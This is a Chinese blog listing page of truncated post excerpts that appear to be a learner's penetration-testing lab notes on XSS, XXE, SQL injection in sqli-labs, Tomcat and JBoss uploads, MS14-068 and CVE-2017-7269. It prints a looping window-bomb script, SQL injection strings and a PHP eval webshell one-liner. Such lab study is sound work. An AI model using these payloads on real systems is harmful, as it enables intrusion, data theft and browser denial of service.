- 博客(26)
- 收藏
- 关注
原创 xss完成浏览器视窗炸弹
无聊,,,发个文章。这个就是很简单的视窗炸弹,放在自己的 xss平台上,执行就会一直打开页面。初学者可以 试一试。function WindowBomb(){var iCounter = 0 // dummy counterwhile (true){window.open(“https://blog.youkuaiyun.com/qfslyy/article/details/111664006?spm=1001.2014.3001.5501”,“CRASHING” + iCounter,“width=10
2022-02-18 00:54:24
398
原创 安装docker,vulhub
1、sudo apt install apt-transport-https ca-certificates curl gnupg-agent software-properties-common2、curl -fsSL https://download.docker.com/linux/debian/gpg | sudo apt-key add -3、sudo echo “deb [arch=amd64] https://download.docker.com/linux/d
2021-01-07 17:07:21
402
原创 XXE
直接对服务器进行攻击的手段,XML外部(DTD)实体注入(XML文档,一种标签语言,作用是将数据,运行部分程序,对象,转换为xml格式存放,在别处调用时继续使用。有漏洞,可以写xml格式恶意代码让服务器执行。)怎么发现xxe:在xxe-lab举例使用xml文档时,使用恶意xml文档。<?xml version="1.0" encoding="UTF-8"?>%aaa;]>抓包,增加以上代码,http地址协商dnslog。cn的地址然年forward,刷新dnslogxx
2021-01-07 17:06:42
248
原创 BEES CMS 获取flag 命令执行漏洞
御剑扫出admin登录后台,出现一个flag基本信息:有一个flag上传一句话木马图片:抓包修改为php,蚁剑或菜刀连接 有个flag.php文件信息泄露包括源码泄露,配置等命令执行漏洞:(非代码执行)应用程序源代码功能实现需要执行系统命令的函数,如果命令连接符控制此函数,就能执行系统命令,。 &,| || 都可以作为连接符使用,如果没有对函数过滤,导致在没有绝对路径的情况下被执行。system (string KaTeX parse error: Expected 'EOF', got
2021-01-07 16:57:43
2225
原创 csrf跨站请求伪造
利用站点内的信任用户利用受信任网站。,web流程:发现xss漏洞,构造代码,发送受害人,受害人执行代码,完成攻击dvwa修改密码:受害者进入修改密码阶段攻击者构造链接或html文件:ip为受害者ip受害者点击后密码会被修改为链接内的密码。中级绕过referer,高级改token...
2021-01-07 15:43:17
208
原创 kali 复现apache httpd多后缀解析漏洞
1:安装docker:并启动下载vulhub2:载入镜像:登录确认:3:写一个php文件,改后缀为多后缀。4:单独上传php文件会被过滤,不允许商场php文件类型。上传多后缀文件:上传成功。访问:测试蚁剑连接:连接成功。...
2021-01-06 19:40:46
341
原创 sqli学习 (4)11 12关
11关:判断注人类型:输入‘报错,输入and1=2不报错,所以判读它是一个字符型注入输入‘ #时不报错,说明闭合符是’ 注释符需要用#或者-- +判断列数:在这三列中的一列查询其数据库名:查表名:’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘security’ #查一下users表的字段:’ union select 1,group_conc
2020-12-27 17:19:21
193
1
原创 sqli(5) 7,8关盲注
sql注入中有一种恶劣的情况是没有回显,这个时候就需要盲注:首先了解一下原理和盲注:需要将字母转换为数字,ascll码,使用ascii()函数,特性:可以与substr,length配合使用select length ascii(substr(‘abc’,1,1)); 字母ascii码范围: 65-122,使用二分法比较。举例1:查数据库长度:and length(database())>10查数据库字符:and ascii(substr(database(),1,1))>90测表
2020-12-26 21:22:21
253
原创 sql注入学习(3)第5和6关报错注入,
今天exp注入时发现数据库版本不对,老版本phpstudy不能换数据库版本,于是换了小皮,但是怎么都连不上数据库,最后发现时php版本忘换了,gan。先了解一下别的注入:exp和updatexmlexp:and exp(~(select xfrom(select x from x.x))x))第一关举例:使用这种方式获得数据库名。欧克了报错注入:updatexml(要操作的文件名,(构造一个xpath语法),新值)updatexml(1,(concat(0x23,(database())
2020-12-26 21:01:24
575
原创 在sqli labs 学习sql注入(2)(基础,1-4关详细步骤)
sql注入环境在学习1里已经搭建好了:sql注入至高原则!:能执行原理就不说了,只说实操主要流程:1:寻找注入点(测试注入点,判断闭合)主要是通过逻辑是和逻辑非进行判断。步骤Ⅰ: and 1=1能执行,不报错,1=2时如果与1=1页面一样的或者报错,那么我们需要进行闭合符测试,也就是‘,“,)及其组合。Ⅱ:测试到and 1=2时查不到数据了,为空,就是有可能是注入点,(因为1=2是逻辑非,当查不到数据的时候,就说明我们的逻辑非被执行了,)。看不懂就看下面流程。第三题对判断这个注入点闭合方式比
2020-12-24 16:12:08
558
原创 渗透测试的信息收集(未完)
笔记:分布式代理:请求行:请求头:post,user-agent(向网站发送浏览器和操作系统信息),cookie(cookie,),content-type谷歌语法,fofa,shodaninurlinurl:.php?idintitle:intext:“转到父目录” (目录遍历漏洞)filetypewordprss漏洞端口信息收集:nmap:-vv -ps -sv...
2020-12-24 12:53:18
158
原创 sql注入学习 1:安装sqli labs master
1安装phpstudy:2下载解压sqli-labs-master,放入phpstudy的www目录下3:访问本机地址即可:4如果出现来连接数据库错误,到这个文件里改一下数据库名和密码,改成自己的phpstudy数据库密码之后再登陆:到这个页面进行数据库重置:就可以开始注入练习了:...
2020-12-24 09:55:20
293
原创 burpsuit简单应用(抓包,回包,密码爆破及其四种模式)
1准备:网页设置代理为本地,可以自行选项配,推荐插件foxy,:2抓包:进入要抓包的网页后,代理设置完成,打开burpsuit在proxy下选择intercept ,开启监听。:接下来在网页进行的操作都会被截下。抓包内容:2:回包:对抓到的包右键点击:发送repeater后:点击go,即可获得回包。3:密码爆破:对抓到的登录界面的包进行右键点击发送到intruder:设置攻击目标IP,端口,本地默认即可:在Postion界面设置爆破点:首先clear,清掉
2020-12-23 19:01:52
8253
原创 复现phpstudy数据库探针过程获取sh
使用数据库将一句话发送到phpstudy本地进行连接原理。1:安装并打开phpstudy,启动服务:2:进入phpMyadmin数据库账户密码默认root,登录3:选择或者创建一个数据库:这里选择了test数据库,选择sql语句,执行以下命令:create table ma (cmd text NOT NULL);//创建名为ma的表,不能为空insert into ma (cmd) values ('<?php @eval($_POST[123])?>');//在ma表中插入一
2020-12-21 20:12:51
1571
原创 burpsuit爆破tomact账户密码(详细)
登录apache tomact:2:进行登陆操作并对此页面进行抓包:可以抓别的网站但是抓不住这个包的原因:需要在先开启监听,打开代理,然后点击登录,这时候会抓到第一个包,需要释放掉,这时会弹出登录,在随便输入,确定,这个时候就可以自动抓到包了设置爆破ip和端口:选中爆破点:设置payloads:需要注意的是,需要在url处取消=或者直接取消url编码:开始爆破:这就是我们的密码了:render访问:对密码进行64base解码得出密码:账户是liu密码是kun.
2020-12-21 19:05:45
531
原创 Jboss远程命令执行部署war包以及如何开启口令防御。
接上一个文章,另一种部署war包方式:远程命令执行部署war包,以及如何开启口令,提高安全。远程命令执行部署war:待定1:jbos exp防御,主要改三个地方1:定义用户密码的:2:改这个文件取消注释3:最下面取消security的注释。:重启服务之后,再次访问便需要口令了:...
2020-12-21 17:21:21
474
原创 jboss 远程连接以及未授权远程上传和访问war包
1:如果jboss启动不了,在环境变量里配一个jboss的系统变量。2:热部署文档位置:一般默认是无法外部访问的,会造成连接失败:可以修改下面的配置文件进行访问:修改为任意ip:这样之后可以在别的机器访问了在别的机器上开启phpstudy,登录jboos,远程访问:在这里上传war包,wai包在哪里就写那个ip,不是要上传过去的那个ip,http;//上传成功:就远程可以访问war包了:...
2020-12-21 16:26:53
572
原创 tomact之put任意文件上传,使用burpsuit抓包jsp马,错误分析
1:成功登录apache tomact:2:抓包:3:发送到repeater:4:更改为put上传:在下方加上jsp马内容,go即可上传成功jsp马只截了一部分,网上应该有很多。5:400错误:换物理机抓包上传试试6:403错误:7:409错误:可能是已经上传成功,或检查是否有重名文件...
2020-12-21 15:21:29
1271
原创 开启apache tomact服务并查看后台,与jdk环境变量配置
一:首先要配置jdk环境变量:安装jdk包之后,更改环境变量,选择计算机,属性,高级,环境变量,一共有三步:在系统变量新建 JAVA_HOME 变量 。变量值填写jdk的安装目录在寻找 Path 变量→编辑在变量值最后输入 %JAVA_HOME%\bin;%JAVA_HOME%\jre\bin;注意分号相隔。最后再新建CLASSPATH:新建 CLASSPATH 变量变量值填写 .;%JAVA_HOME%\lib;%JAVA_HOME%\lib\tools.jar前面有一个点
2020-12-21 10:52:18
1396
3
原创 复现ms-14-068票据
**复现ms-14068票据注入提权步骤个人笔记,欢迎指导讨论**此时登录的用户是域里面的mmy用户查看本机SID查看域控计算机全名验证域成员是否能访问域控可以看到拒绝访问,域成员此时没有权限访问域控文件把相关工具包拖进来之后运用mimikatz工具清空它的票据,可以看到已经成功了接下来扫描ms14-068漏洞,查看系统是否打了补丁扫描结果什么都没有,所以确定没有打补丁,可以利用ms14-068漏洞进行攻击程序执行完成后,在ms14-068文件夹里生成了一个票据文件
2020-12-19 19:32:44
500
2
原创 centos单用户忘记密码,改密码,重置密码(一步一截图)
centos单用户重置密码在开机读秒根据提示,按e进入编辑界面时按任意键进入grub菜单选择第二项:内核,继续按e编辑结尾输入:[空格] 1[回车]回到菜单界面,按b启动启动后就会进入到单用户模式,可以使用passwd命令直接重置root用户密码密码重置成功,reboot重启...
2020-12-19 19:10:07
370
1
原创 winserver2008DHCP服务搭建
添加dhcp服务创建完成进入管理界面配置地址池之后直接release renew配置成功。关闭本机对vmare的dhcp服务
2020-12-19 18:55:59
268
1
原创 DNS服务搭建
DNS服务搭建在添加或删除程序中添加相关服务后,打开服务器管理首先添加dns服务器,以创建正向查找区域为例填写区域名称选择创建新文件填写本机ip地址进入dns服务管理建立主机和指针通过nslookup ip/域名 验证成功...
2020-12-19 18:48:43
146
1
原创 2003server服务器的IIS服务七项配置
完成IIS七项配置(修改端口、修改IP、修改主目录、开启目录浏览、关闭匿名访问、IP访问授权、修改默认文档IIS实验:在进行配置之前先安装服务:打开虚拟机,进入winserver2003,安装iis服务:进入应用程序服务器,详细信息:选择Iis信息服务,安装以下服务:安装完成后进入IIS信息服务管理器:进入管理器之后右击默认站点打开属性:在网站属性下可以修改网站端口,ip地址:在主目录上可以开启目录访问权限:在此出可以打开主目录,添加文本文档:或者修改我们的主目录:
2020-12-19 18:31:31
658
原创 cve-2017-7269
CEV-2017-7269(过程,步骤,说明)1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas)(只是个人学习笔记)在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas)之后需要将包引入到msf中:可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
2020-12-19 18:11:53
2549
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人
RSS订阅